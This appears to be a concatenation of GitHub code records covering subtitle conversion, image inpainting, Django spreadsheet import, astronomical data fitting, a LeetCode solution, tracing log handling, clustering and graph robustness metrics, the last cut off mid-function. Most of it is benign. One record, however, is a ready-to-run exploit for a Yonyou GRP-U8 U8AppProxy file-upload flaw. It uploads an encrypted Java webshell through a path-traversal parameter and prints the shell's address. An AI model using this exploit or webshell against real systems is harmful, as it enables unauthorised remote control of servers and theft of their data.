sep = '. one. '\n text = sep.join(sub_list)\n text_trans = translate(text, from_lang, to_lang)\n trans_list = text_trans.split('一个。')\n\n if not len(format_list) == len(sub_list) == len(trans_list):\n print('Length not match!')\n else:\n with open('Output/' + output_file, 'w', encoding='utf-8') as f_out:\n for i, line in enumerate(format_list):\n f_out.write(format_list[i])\n trans_line = delete_end_punc(trans_list[i])\n if bi_sub:\n if from_lang_top:\n f_out.write(sub_list[i] + '\\n')\n f_out.write(trans_line + '\\n\\n')\n else:\n f_out.write(trans_line + '\\n')\n f_out.write(sub_list[i] + '\\n\\n')\n else:\n f_out.write(trans_line + '\\n\\n')\n return output_file\n\n\ndef srt_t2ass_t(time):\n time_list = list(map(int, re.split(re.compile('[^0-9]+'), time)))\n ms_s = time_list[3] + time_list[2] * 1000 + time_list[1] * 1000 * 60 + time_list[0] * 1000 * 60 * 60\n ms_e = time_list[7] + time_list[6] * 1000 + time_list[5] * 1000 * 60 + time_list[4] * 1000 * 60 * 60\n ms_sr = int(round(ms_s / 10) * 10)\n ms_er = int(round(ms_e / 10) * 10)\n hour_s = ms_sr // (1000 * 60 * 60)\n hour_e = ms_er // (1000 * 60 * 60)\n minute_s = ms_sr % (1000 * 60 * 60) // (1000 * 60)\n minute_e = ms_er % (1000 * 60 * 60) // (1000 * 60)\n second_s = ms_sr % (1000 * 60 * 60) % (1000 * 60) // 1000\n second_e = ms_er % (1000 * 60 * 60) % (1000 * 60) // 1000\n cs_s = ms_sr % (1000 * 60 * 60) % (1000 * 60) % 1000 // 10\n cs_e = ms_er % (1000 * 60 * 60) % (1000 * 60) % 1000 // 10\n ass_s = '{}:{}:{}.{},'.format(str(hour_s), str(minute_s).zfill(2), str(second_s).zfill(2), str(cs_s).zfill(2))\n ass_e = '{}:{}:{}.{}'.format(str(hour_e), str(minute_e).zfill(2), str(second_e).zfill(2), str(cs_e).zfill(2))\n return ass_s + ass_e\n\n\ndef srt2ass(input_file, language, swap=False):\n \"\"\"\n Convert srt to ass\n :param input_file:\n :param language: the language of the input srt file. ex. 'zh_en'\n :param swap: whether transform the position of the two subtitle layers in different languages\n \"\"\"\n config = toml.load('config.toml')\n time_list = []\n output_file = re.search(re.compile(r'[^/]+\\.'), input_file).group() + 'ass'\n\n if len(language) > 2 and re.search(re.compile('zh'), language):\n high_line, low_line = language[:2] + '_line', language[-2:] + '_line'\n high_sub_list, low_sub_list = [], []\n with open(input_file, 'r', encoding='utf-8') as f_in:\n sub_flag = 0\n for line in f_in:\n if re.search(re.compile(r'^\\d*\\n$'), line):\n continue\n elif re.search(re.compile(r'^\\d{2}:\\d{2}:\\d{2},\\d{3}'), line) and not sub_flag:\n time_list.append(line.strip())\n sub_flag = 1\n elif sub_flag == 1:\n high_sub_list.append(line)\n sub_flag = 2\n elif sub_flag == 2:\n low_sub_list.append(line)\n sub_flag = 0\n else:\n print('Unidentified line: {}'.format(line))\n if not len(time_list) == len(high_sub_list) == len(low_sub_list):\n print('Length not match!')\n else:\n with open('Output/' + output_file, 'w', encoding='utf-8') as f_out:\n if language == 'zh_en' or language == 'en_zh':\n if swap:\n language = language[-2:] + '_' + language[:2]\n f_out.write(config[language + '_ass']['header'] + '\\n')\n for i, line in enumerate(time_list):\n ass_t = srt_t2ass_t(time_list[i])\n ass_t_p = re.compile(r'\\d+:\\d{2}:\\d{2}.\\d{2},\\d+:\\d{2}:\\d{2}.\\d{2}')\n high_sub = re.sub(ass_t_p, ass_t, config[language + '_ass'][high_line]) + high_sub_list[i]\n low_sub = re.sub(ass_t_p, ass_t, config[language + '_ass'][low_line]) + low_sub_list[i]\n if swap:\n f_out.write(low_sub)\n f_out.write(high_sub)\n else:\n f_out.write(high_sub)\n f_out.write(low_sub)\n\n\ndef srt_trans_ass(input_file, from_lang, to_lang='zh', bi_sub=True, from_lang_top=True):\n trans = srt_trans_srt(input_file, from_lang, to_lang, bi_sub, from_lang_top)\n language = re.search(re.compile(r'(_[a-z]{2}){1,2}(?=\\.)'), trans).group()[1:]\n srt2ass(trans, language)\n\n\ninput_srt = 'D:/Category/Video/ZBrush 2020从入门到精通全方位训练课ZBrush 2020 Essential Training/002 - Preparing for this course.srt'\nsrt2ass(input_srt, 'zh_en', swap=True)\n# srt_trans_srt(input_srt)\n# input_srt = 'Output/16_trans.srt'\n# srt2ass(input_srt, 'en_zh')\n","repo_name":"hooyuser/SubTranslator","sub_path":"SubTranslator.py","file_name":"SubTranslator.py","file_ext":"py","file_size_in_byte":8304,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"19187981796","text":"import argparse\nimport tensorflow as tf\nimport numpy as np\nfrom inpainter import ImageInpaint\nfrom completion_net import CompletionNetwork\nfrom gan import LocalDiscriminator, GlobalDiscriminator\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"Arg Parser\", formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--task', required=True, choices=['train', 'test', 'both'], help='training or testing (a saved model)')\n parser.add_argument('--checkpoint_path', default='', help='saved model location')\n \n return parser.parse_args()\n\ndef get_data():\n (training_images, _), (test_images, _) = tf.keras.datasets.cifar100.load_data()\n return training_images, test_images\n\ndef compile_model(model):\n from utils.losses import completion_loss, discriminator_loss, joint_loss\n\n optimizer = tf.keras.optimizers.Adam()\n losses = [tf.keras.losses.MeanSquaredError(reduction=tf.keras.losses.Reduction.SUM), discriminator_loss, joint_loss]\n acc = None # fill in later with dice coeff\n\n model.compile(\n optimizer = optimizer,\n losses = losses,\n metrics = [acc]\n )\n\ndef load_model(checkpoint):\n model = tf.keras.models.load_model(checkpoint, \n custom_objects = dict(\n CompletionNetwork = CompletionNetwork,\n LocalDiscriminator = LocalDiscriminator,\n GlobalDiscriminator = GlobalDiscriminator\n ),\n compile = False)\n\n from functools import partial\n model.test = partial(ImageInpaint.test, model)\n model.train = partial(ImageInpaint.train, model)\n model.compile = partial(ImageInpaint.compile, model)\n model.update_variables = partial(ImageInpaint.update_variables, model)\n \n return model\n\ndef train(model, train_images, batch_size, T_C, T_D, T, restore):\n\n # note: apply data augmentation before training\n try:\n augment_fn = tf.keras.Sequential([\n tf.keras.layers.RandomFlip(\"horizontal_and_vertical\"),\n tf.keras.layers.RandomContrast(0.10)\n ])\n model.train(train_images, batch_size, T_C, T_D, T, augment_fn, restore=restore)\n except KeyboardInterrupt as e:\n print(\"\\nKey-value interruption\")\n\ndef test(model, test_images):\n model.test()\n # initialize stats, test the model, print out the stats at the end\n pass\n\nif __name__ == '__main__':\n\n # for now you can just run train.py w/o proving any command line arguments\n batch_size = 25\n #T_C, T_D, T = 1800, 200, 12000\n T_C, T_D, T = 1800, 200, 3000\n\n args = parse_args()\n test_images = None\n\n # for training, add `--task train --checkpoint_path ./model`\n if (args.task == 'train' or args.task == 'both'):\n train_images, test_images = get_data()\n np.random.shuffle(train_images)\n model = ImageInpaint()\n \n compile_model(model)\n train(model, train_images, batch_size, T_C, T_D, T, True)\n \n if (args.checkpoint_path):\n model(tf.random.normal((1,32,32,3)))\n tf.keras.models.save_model(model, args.checkpoint_path)\n \n if (args.task == 'test' or args.task == 'both'):\n if (args.checkpoint_path):\n if (test_images == None):\n _, test_images = get_data()\n\n model = load_model(args.checkpoint_path)\n test(model, test_images)\n else:\n print(\"ERROR: Need to provide checkpoint path!\")","repo_name":"evwlu/image-inpainting","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4892708536","text":"import logging\nimport xlrd\n\nfrom collections import OrderedDict\n\nfrom django.db import transaction\nfrom django.forms.utils import ErrorDict\n\nfrom catalog.forms import CatalogItemImportForm\n\n\nIMPORT_COLUMN_NAMES = [\n 'item_code',\n 'item_category',\n 'description',\n 'donor',\n 'donor_t1',\n 'supplier',\n 'weight',\n 'unit',\n 'price_local',\n 'price_usd',\n]\n\n# Give up import after this many errors\nMAX_IMPORT_ERRORS = 50\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass CatalogImportFailure(Exception):\n def __init__(self, errlist):\n self.errlist = errlist\n\n\nclass SimpleSheet(object):\n \"\"\"\n Simplified interface to a sheet in an Excel spreadsheet.\n \"\"\"\n def __init__(self, filename, sheet_number):\n try:\n book = xlrd.open_workbook(filename)\n except xlrd.XLRDError as e:\n raise CatalogImportFailure(errlist=e.args)\n if sheet_number >= book.nsheets:\n raise ValueError(\"No sheet number %d in this spreadsheet\" % sheet_number)\n self.sheet = book.sheet_by_index(sheet_number)\n if not self.sheet.nrows:\n raise ValueError(\"Sheet %d has no rows\" % sheet_number)\n\n def column_names(self):\n \"\"\"\n Return values from first row\n \"\"\"\n return self.sheet.row_values(0)\n\n def rows(self):\n \"\"\"\n Generator that returns (row_number, ordered_dictionary_of_values) for each row.\n The row number is what a human would see, e.g. 1-based index.\n The first row - assumed to have column names - is omitted from this method's results.\n \"\"\"\n names = self.column_names()\n for row_index in range(1, self.sheet.nrows):\n values = self.sheet.row_values(row_index)\n d = OrderedDict()\n for name, value in zip(names, values):\n d[name] = value\n yield (row_index + 1, d)\n\n\ndef format_form_errors(row_number, form):\n \"\"\"\n Return form errors as a list of strings.\n \"\"\"\n if isinstance(form.errors, ErrorDict):\n # keys are the field names\n errlist = []\n for field_name, list_of_errors in form.errors.items():\n for e in list_of_errors:\n if field_name == '__all__':\n errlist.append('row %d: %s' % (row_number, e))\n else:\n errlist.append('row %d: field %s: %s' % (row_number, field_name, e))\n return errlist\n\n\ndef catalog_import(path):\n \"\"\"\n Import catalog items from a spreadsheet in the file at the given path.\n\n Assumes the first sheet has the data, the first row is the column names, and\n the columns we want to import have the same names as the fields in the model.\n\n If anything fails, raises CatalogImportFailure.\n\n If successful, returns the number of items imported\n \"\"\"\n\n # It's not really necessary to break this code up into separate functions, but\n # it'll simplify testing.\n try:\n sheet = SimpleSheet(path, 0)\n except ValueError as e:\n raise CatalogImportFailure(errlist=e.args)\n return _catalog_import_from_simple_sheet(sheet)\n\n\ndef _catalog_import_from_simple_sheet(sheet):\n \"\"\"import catalog items from a SimpleSheet instance\"\"\"\n\n # Make sure expected columns exist\n columns_not_found = (set(IMPORT_COLUMN_NAMES)\n - set(sheet.column_names()))\n if columns_not_found:\n missing_cols = '%s ' * len(columns_not_found) % tuple(columns_not_found)\n raise CatalogImportFailure(errlist=[\"Some columns not found: %s\" % missing_cols])\n\n # Start importing\n num_new = 0\n errors = []\n # import all, or none\n with transaction.atomic():\n for row_number, values in sheet.rows():\n try:\n num_new += 1\n form = CatalogItemImportForm(data=values)\n if form.is_valid():\n form.save()\n else:\n errors.extend(format_form_errors(row_number, form))\n if len(errors) >= MAX_IMPORT_ERRORS:\n errors.append(\"Giving up after %d errors\" % MAX_IMPORT_ERRORS)\n break\n except Exception as e:\n logger.exception(\"Importing %r\" % values)\n errors.append(\"row %d: %s\" % (row_number, e))\n if errors:\n raise CatalogImportFailure(errors)\n return num_new\n","repo_name":"theirc/CTS","sub_path":"catalog/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"77"} +{"seq_id":"31773711693","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script is an example on how to use the library ``nsc.py``\r\nto use the NSC method to get self-calibrated null depth.\r\n\"\"\"\r\n\r\nfrom ndps_core import run_ndps\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nprint('Start')\r\n# =============================================================================\r\n# Settings\r\n# =============================================================================\r\n# Attempt to deconvolve dark noise from photometries by assuming dark\r\n# and photometry to be normally distributed\r\nactivate_dark_correction = False\r\n# Activate the frame sorting to remove frames with non_Gaussian phase events\r\nactivate_phase_sorting = True\r\n# Use a linear model of the null depth instead of the exact one\r\nactivate_linear_model = False\r\n# Oversampling all spectral channels in MC to mimic temporal loss of coherence\r\nactivate_oversampling = True\r\n# Display null/antinull outputs vs time for setting the sorting parameters\r\nactivate_preview_only = False\r\n# Activate basin-hopping strategy for finding the global minimum in fit\r\nactivate_random_init_guesses = True\r\n# Deconvolve photometries after assuming they follow a Normal distribution.\r\nactivate_photo_resampling = False\r\n# Calculate the null depth in the old-fashioned way (cf Hanot et al. (2011))\r\nactivate_save_classic_esti = False\r\n#\r\nactivate_spectral_sorting = False\r\nactivate_spectral_binning = False\r\nactivate_time_binning_photometry = True\r\nactivate_use_antinull = True\r\nactivate_use_photometry = False\r\nactivate_remove_dark = False\r\nactivate_draw_model = True\r\nactivate_lbti_mode = False\r\nactivate_rvu = True\r\n# Use the measured zeta coeff. If False, value are set to 0.5\r\nactivate_zeta = True\r\n# Do not do fit\r\nskip_fit = False\r\n# Explore parameter space instead of fit\r\nchi2_map_switch = False\r\n# Map the parameters space over astronull, DeltaPhi mu and sigma\r\nmap_na_sz = 10\r\nmap_mu_sz = 80\r\nmap_sig_sz = 10\r\n# Binning the frames before any calculation\r\nglobal_binning = 1\r\n# Total number of elements to generate for the MC\r\nn_samp_total = int(1e+7)\r\n# Number of samples per loop to relieve computation power\r\nn_samp_per_loop = int(1e+7)\r\n# Number of frames to bin before doing the sorting\r\nnb_frames_sorting_binning = 100\r\n# Number of frames to bin to go toward a dark-free histogram of injection\r\nnb_frames_binning_photometry = -1\r\n# Choice of optimizer\r\nselect_optimizer = 0 # 0 = Chi2, 1 = lklh\r\n\r\n# Which data files to load\r\n# supercount = 1\r\n# z = supercount * 100\r\n# for k in range(z, z+1):\r\nfor supercount in range(2, 3):\r\n plt.close('all')\r\n z = supercount * 100\r\n k = z\r\n nb_files_data = (0, None)\r\n # Which dark files to load\r\n nb_files_dark = (0, None)\r\n # lower and upper bound of the iteration loop for basin hopping method\r\n basin_hopping_nloop = (10*k, 10*k+10)\r\n # Baselines to process\r\n which_nulls = ['null6']\r\n \r\n # Lower bound of the bandwidth to process\r\n wl_min = 1525\r\n # Upper bound of the bandwidth to process\r\n wl_max = 1575\r\n \r\n activates = (activate_dark_correction, activate_phase_sorting, activate_linear_model,\r\n activate_oversampling, activate_preview_only,\r\n activate_random_init_guesses, activate_photo_resampling,\r\n activate_save_classic_esti, activate_spectral_sorting,\r\n activate_spectral_binning, activate_time_binning_photometry,\r\n activate_use_antinull, activate_use_photometry,\r\n activate_zeta, activate_remove_dark, activate_draw_model, activate_lbti_mode,\r\n select_optimizer, activate_rvu)\r\n \r\n maps_sz = (map_na_sz, map_mu_sz, map_sig_sz)\r\n \r\n nbs = (global_binning, n_samp_total, n_samp_per_loop,\r\n nb_frames_sorting_binning,\r\n nb_frames_binning_photometry, nb_files_data, nb_files_dark,\r\n basin_hopping_nloop)\r\n \r\n wl_minmax = (wl_min, wl_max)\r\n \r\n \r\n out = run_ndps(activates, skip_fit, chi2_map_switch, maps_sz, nbs, which_nulls,\r\n wl_minmax, supercount)\r\n","repo_name":"mamartinod/ndps","sub_path":"run_ndps.py","file_name":"run_ndps.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43373215078","text":"# You are visiting a farm that has a single row of fruit trees arranged from left to right.\n# The trees are represented by an integer array fruits where fruits[i] is the type of fruit the ith tree produces.\n# You want to collect as much fruit as possible.\n# However, the owner has some strict rules that you must follow:\n# - You only have two baskets, and each basket can only hold a single type of fruit.\n# There is no limit on the amount of fruit each basket can hold.\n# - Starting from any tree of your choice, you must pick exactly one fruit from every tree\n# (including the start tree) while moving to the right. The picked fruits must fit in one of your baskets.\n# - Once you reach a tree with fruit that cannot fit in your baskets, you must stop.\n# Given the integer array fruits, return the maximum number of fruits you can pick.\n# --------------------\n# 1 <= fruits.length <= 10 ** 5\n# 0 <= fruits[i] < fruits.length\nfrom random import randint\n\n\ndef total_fruit(fruits: list[int]) -> int:\n # working_sol (77.79%, 55.45%) -> (754ms, 22.5mb) time: O(n) | space: O(n)\n if len(fruits) == 1:\n return 1\n # ! 0 <= fruits[i] < fruits.length !\n # No reasons for a dict.\n gathered: list[int] = [0 for _ in fruits]\n type1: int = -1\n type2: int = -1\n # Standard sliding window.\n l_limit: int = 0\n r_limit: int = 0\n max_fruits: int = 0\n # Expand and count while we can.\n while r_limit != len(fruits):\n if fruits[r_limit] == type1:\n gathered[type1] += 1\n elif fruits[r_limit] == type2:\n gathered[type2] += 1\n elif type1 == -1:\n type1 = fruits[r_limit]\n gathered[type1] += 1\n elif type2 == -1:\n type2 = fruits[r_limit]\n gathered[type2] += 1\n # Shrink when encounter different type3.\n elif fruits[r_limit] != type1 or fruits[r_limit] != type2:\n # We need to reassign type1 or type2 to a new type.\n # Exhaust one of them.\n while gathered[type1] != 0 and gathered[type2] != 0:\n gathered[fruits[l_limit]] -= 1\n l_limit += 1\n # And reassign.\n if gathered[type1] == 0:\n type1 = fruits[r_limit]\n gathered[type1] += 1\n if gathered[type2] == 0:\n type2 = fruits[r_limit]\n gathered[type2] += 1\n # 0-indexed, +1 for correct length.\n max_fruits = max(max_fruits, (r_limit - l_limit) + 1)\n r_limit += 1\n return max_fruits\n\n\n# Time complexity: O(n) -> worst case == continuous sub until last element, so we will extra delete every index once\n# n - len of input_array^^| until n - 2 => O(n + (n - 2)) => O(n).\n# Auxiliary space: O(n) -> creating extra array with same size as input_array => O(n).\n\n\ntest: list[int] = [1, 2, 1]\ntest_out: int = 3\nassert test_out == total_fruit(test)\n\ntest = [0, 1, 2, 2]\ntest_out = 3\nassert test_out == total_fruit(test)\n\ntest = [1, 2, 3, 2, 2]\ntest_out = 4\nassert test_out == total_fruit(test)\n\ntest = [randint(0, 10 ** 3 - 1) for _ in range(10 ** 3)]\nprint(test)\n","repo_name":"Massprod/leetcode-testing","sub_path":"leetcode_problems/p904_fruit_into_baskets.py","file_name":"p904_fruit_into_baskets.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39293706225","text":"# coding: utf-8\nimport datetime\nimport logging\nfrom logging import Handler\n\nimport opentracing\n\nfrom tracing import tags\n\n\nclass ErrorTraceHandler(Handler):\n \"\"\"\n Custom StreamHandler implementation to forward python logger records to Jaeger / OpenTracing\n \"\"\"\n def __init__(self, level=logging.ERROR):\n \"\"\"\n Initialize the handler.\n\n If stream is not specified, sys.stderr is used.\n \"\"\"\n super().__init__(level)\n\n def emit(self, record):\n try:\n msg = self.format(record)\n operation_name = 'logger[{}]'.format(record.name)\n parent_span = opentracing.tracer.active_span\n if not parent_span:\n return\n with opentracing.tracer.start_span(operation_name, child_of=parent_span) as logger_span:\n logger_span.set_tag(tags.SPAN_KIND, tags.SPAN_KIND_LOG)\n logger_span.set_tag(tags.LOGGER, record.name)\n\n logger_span.log_kv({\n 'event': tags.LOG_ERROR,\n 'message': msg,\n 'log.stack_info': record.stack_info,\n 'log.asctime': getattr(record, 'asctime', datetime.datetime.now()),\n 'log.created': record.created,\n 'log.filename': record.filename,\n 'log.funcName': record.funcName,\n 'log.levelname': record.levelname,\n 'log.lineno': record.lineno,\n 'log.module': record.module,\n 'log.msecs': record.msecs,\n 'log.name': record.name,\n 'log.pathname': record.pathname,\n 'log.process': record.process,\n 'log.thread': record.thread\n })\n except Exception as e:\n self.handleError(record)\n","repo_name":"pushiqiang/jaeger_flask_django","sub_path":"tracing/logger_handler.py","file_name":"logger_handler.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"77"} +{"seq_id":"26105144629","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import load_iris\n\n\niris = load_iris()\niris=[iris.data]\n\niris_df\t= pd.DataFrame (iris.data, columns= iris.feature_names )\n\nfrom sklearn.cross_validation import train_test_split\nfeatures_train, features_test = train_test_split(iris_df, test_size = 0.1, random_state = 0)\n\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\n\nfeatures_train = sc.fit_transform(features_train)\nfeatures_test = sc.transform(features_test)\n\nfrom sklearn.decomposition import PCA\npca = PCA(n_components = 2)\nfeatures_train = pca.fit_transform(features_train)\nfeatures_test = pca.transform(features_test)\nexplained_variance = pca.explained_variance_ratio_\n\nfrom sklearn.cluster import KMeans\nkmeans = KMeans(n_clusters = 3, init = 'k-means++', random_state = 0)\npred_cluster = kmeans.fit_predict(features_train)\n\nplt.scatter(features_train[pred_cluster == 0, 0], features_train[pred_cluster == 0, 1], c = 'blue', label = 'Cluster 1')\nplt.scatter(features_train[pred_cluster == 1, 0], features_train[pred_cluster == 1, 1], c = 'red', label = 'Cluster 2')\nplt.scatter(features_train[pred_cluster == 2, 0], features_train[pred_cluster == 2, 1], c = 'green', label = 'Cluster 3')\nplt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], c = 'yellow', label = 'Centroids')\nplt.title('Clusters of datapoints')\nplt.xlabel('X Cordindates')\nplt.ylabel('Y Cordinates')\nplt.legend()\nplt.show()\n","repo_name":"pulkitmathur10/FSBC2019","sub_path":"Day 24/iris_red.py","file_name":"iris_red.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73934768567","text":"#! python3\r\n\r\n\"\"\"\r\n\r\n@FileName: 用友 GRP-U8 U8AppProxy\r\n@Author: londly\r\n@Datetime: 20230316\r\n\r\n\"\"\"\r\nimport argparse\r\nfrom optparse import OptionParser\r\nfrom urllib.parse import urljoin\r\nimport requests\r\nimport sys\r\n\r\nfrom termcolor import cprint\r\n\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\ndef banner():\r\n print('''\r\n ***************************************************************\r\n 用友NC U8AppProxy 任意文件上传漏洞检测工具\r\n Author: londly\r\n First Date: 2023/03/18\r\n ***************************************************************\r\n \r\n *************************警 告*********************************\r\n 本工具旨在帮助企业快速定位漏洞、修复漏洞,仅限授权安全测试使用!\r\n 请严格遵守《中华人民共和国网络安全法》,禁止未授权非法攻击站点!\r\n ***************************************************************\r\n \r\n \r\n ''');\r\n\r\ndef main(url):\r\n print(\"[-]正在检测用友NC U8AppProxy是否存在任意文件上传漏洞\")\r\n target = urljoin(url, \"/U8AppProxy?gnid=myinfo&id=saveheader&zydm=../../hello_U8\")\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68\",\r\n \"Accept-Encoding\": \"gzip, deflate\"\r\n }\r\n shell_content = '<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>'\r\n\r\n files = [('file', ('hello_U8.jsp', shell_content, 'application/octet-stream'))]\r\n response = requests.post(target, files=files, headers=headers, timeout=30, verify=False)\r\n webshell = urljoin(url, \"hello_U8.jsp\")\r\n response = requests.get(webshell, headers=headers, timeout=30, verify=False)\r\n if response.status_code == 200:\r\n print(\"[+] 存在NC_U8AppProxy任意文件上传漏洞,即将上传webshell\")\r\n print(\"[+] 文件上传成功!\")\r\n print(\"[+] webshell: \" + webshell)\r\n if response.status_code == 403:\r\n print(\"[-] 文件上传成功,但访问被拦截!\")\r\n\r\n\r\ndef _init():\r\n global url\r\n banner()\r\n usage = '\\n\\t' \\\r\n 'python3 %prog -u domain.com\\n\\t' \\\r\n\r\n parse = OptionParser(usage=usage)\r\n parse.add_option('-u', '--url', dest='url', type='string', help='target url')\r\n options, args = parse.parse_args()\r\n url = options.url\r\n if url:\r\n main(url)\r\n\r\nif __name__ == '__main__':\r\n\r\n _init()\r\n\r\n\r\n # if (args.check_file):\r\n # multithreading(main, args.check_file, 8)\r\n","repo_name":"Londly01/poc-hub","sub_path":"用友 GRP-U8 U8AppProxy 任意文件上传漏洞/londly.py","file_name":"londly.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"17699306264","text":"from queue import Queue\nfrom functools import reduce\nimport numpy as np\nimport scipy.linalg\nimport networkx as nx\n\n# Calculates G, or the survival fitness function, for a given graph g\n# Input: A graph\n# Output: A fitness score\ndef evaluate(g, alpha):\n normEff = efficiency(g)\n normRob = robustness(g)\n return alpha * normEff + (1 - alpha) * normRob\n\n# Calculates the efficiency of the graph by analyzing distances between every pair of\n# nodes. This uses the Floyd Warshall algorithm.\n# Note: if an invalid graph is given, it returns -1\n# Input: A graph\n# Output: The efficiency value\ndef efficiency(g):\n \"\"\" Calculates the efficiency of the graph by analyzing distances between every pair of nodes\n using the Floyd Warshall Algorithm\n \"\"\"\n if (g.n <= 1): # Graph with just one node have no efficiency\n return -1\n\n # Find the distance for every pair of nodes\n dist = [[0 for c in range(g.n)] for r in range(g.n)]\n INF = 999\n\n # Set missing edges to infinity\n for r in range(g.n):\n for c in range(g.n):\n dist[r][c] = g.adj[r][c]\n if r != c and g.adj[r][c] == 0: # No edge exists between r and c\n dist[r][c] = INF\n\n # Floyd Warshall\n for k in range(g.n):\n for i in range(g.n):\n for j in range(g.n):\n dist[i][j] = min(dist[i][j], dist[i][k] + dist[k][j])\n\n # Reset edges that are infinity\n for r in range(g.n):\n for c in range(g.n):\n if dist[r][c] == INF:\n dist[r][c] = 0\n\n # Calculation for average APSP for the given graph\n APSP = 0\n for r in dist:\n APSP += reduce(lambda x, y: x + y, r)\n APSP /= g.n * (g.n - 1)\n\n # APSP for a star\n starAPSP = 2 * (1 - 1 / g.n)\n\n # SECON metric\n # return starAPSP / APSP\n\n # New metric\n return 1 / APSP\n\n# Calculates the structural and functional robustness of a graph\n# Input: A graph\n# Output: The robustness value\ndef robustness(g):\n \"\"\" Calculates the structural and functional robustness of a graph by iterating and removing each node\n \"\"\"\n strucR = [0] * g.n # Structural robustness with respect to each node\n # funcR = [0] * g.n # Functional robustness\n\n # removes each node one-by-one\n for j in range(g.n):\n modifiedAdj = []\n\n for r in range(g.n):\n if r != j:\n tmpArr = []\n for c in range(g.n):\n if c != j:\n tmpArr.append(g.adj[r][c])\n modifiedAdj.append(tmpArr)\n results = robustnessStack(modifiedAdj)\n\n # SECON metric\n # strucR[j] = results / (g.n - 2)\n\n # New metric: Number of neighbors\n neighbors = 0\n for r in range(g.n):\n if r != j and g.adj[j][r]:\n neighbors += 1\n strucR[j] = (results / (g.n - 2)) * neighbors / (g.e * 2)\n\n # SECON metric\n # return min(strucR)\n\n # New metric\n return sum(strucR)\n\n# A robustness helper function that runs a DFS on the graph to populate a stack\n# before running the individual functional and structural robustness calculations\n# Input: An adjacency matrix\n# Output: [functional robustness, structural robustness]\ndef robustnessStack(adj):\n \"\"\" Runs a Depth-First Search on a Graph to Populate a stack\n before running the individual functional and structural\n robustness calculations\n \"\"\"\n visited = [False] * len(adj)\n stack = []\n\n for i in range(len(adj)):\n if visited[i] == False:\n dfsStackRecurse(adj, i, visited, stack)\n\n transposeAdj = transpose(adj)\n # return [functionalRobustness(transposeAdj, list(stack), adj),\n # structuralRobustness(transposeAdj, list(stack))]\n return structuralRobustness(transposeAdj, stack)\n\n# Calculates the functional robustness with respect to vertex j\n# for a given graph (with vertex j removed, presumeably)\n# TODO: Too inefficient time-wise (30x closer then structural calculation)\n# Input: A transposed adjacency matrix of a graph, stack from DFS, original adjacency matrix\n# Output: Functional robustness of the graph\ndef functionalRobustness(transposeAdj, stack, adj):\n \"\"\" Calculates functional robustness with respect to vertex j\n \"\"\"\n visited = [False] * len(adj)\n largestSCC = []\n\n while len(stack) > 0:\n i = stack.pop()\n if visited[i] == False:\n tempSCC = dfsSCCRecurse(transposeAdj, i, visited)\n if len(tempSCC) > len(largestSCC):\n largestSCC = tempSCC\n\n # Create new graph with just the largest SCC\n newAdj = []\n newEdges = 0\n for i in largestSCC:\n tmpArr = []\n for j in largestSCC:\n if i == j:\n tmpArr.append(0)\n else:\n tmpArr.append(adj[i][j])\n newEdges += adj[i][j]\n newAdj.append(tmpArr)\n\n newG = Graph(len(newAdj), newEdges, True, False)\n newG.adj = newAdj\n return efficiency(newG)\n\n# Calculates the effective accessibility of a graph.\n# It does this by computing two DFS using Kosaraju's algorithm\n# Input: A transposed adjacency matrix for a graph, stack from DFS\n# Output: The effective accessibility of the graph\ndef structuralRobustness(transposeAdj, stack):\n visited = [False] * len(transposeAdj)\n accessibility = 0\n\n while len(stack) > 0:\n i = stack.pop()\n if visited[i] == False:\n accessibility += len(dfsSCCRecurse(transposeAdj, i, visited)) - 1\n return accessibility\n\n# Runs a DFS of the graph and populates a stack with deepest nodes first\n# Input: Adjacency matrix, node, boolean array of visited values, stack\n# Output: Nothing\ndef dfsStackRecurse(adj, i, visited, stack):\n visited[i] = True\n for j in range(len(adj[i])):\n if adj[i][j] == 1 and visited[j] == False:\n dfsStackRecurse(adj, j, visited, stack)\n stack = stack.append(i)\n\n# Runs a DFS on a graph and sums up the number of nodes of the strongly\n# connected component (SCC) that contains node i\n# Input: Adjacency matrix, node, boolean array of visited values\n# Output: Nodes in the respective SCC (array)\ndef dfsSCCRecurse(adj, i, visited):\n visited[i] = True\n components = 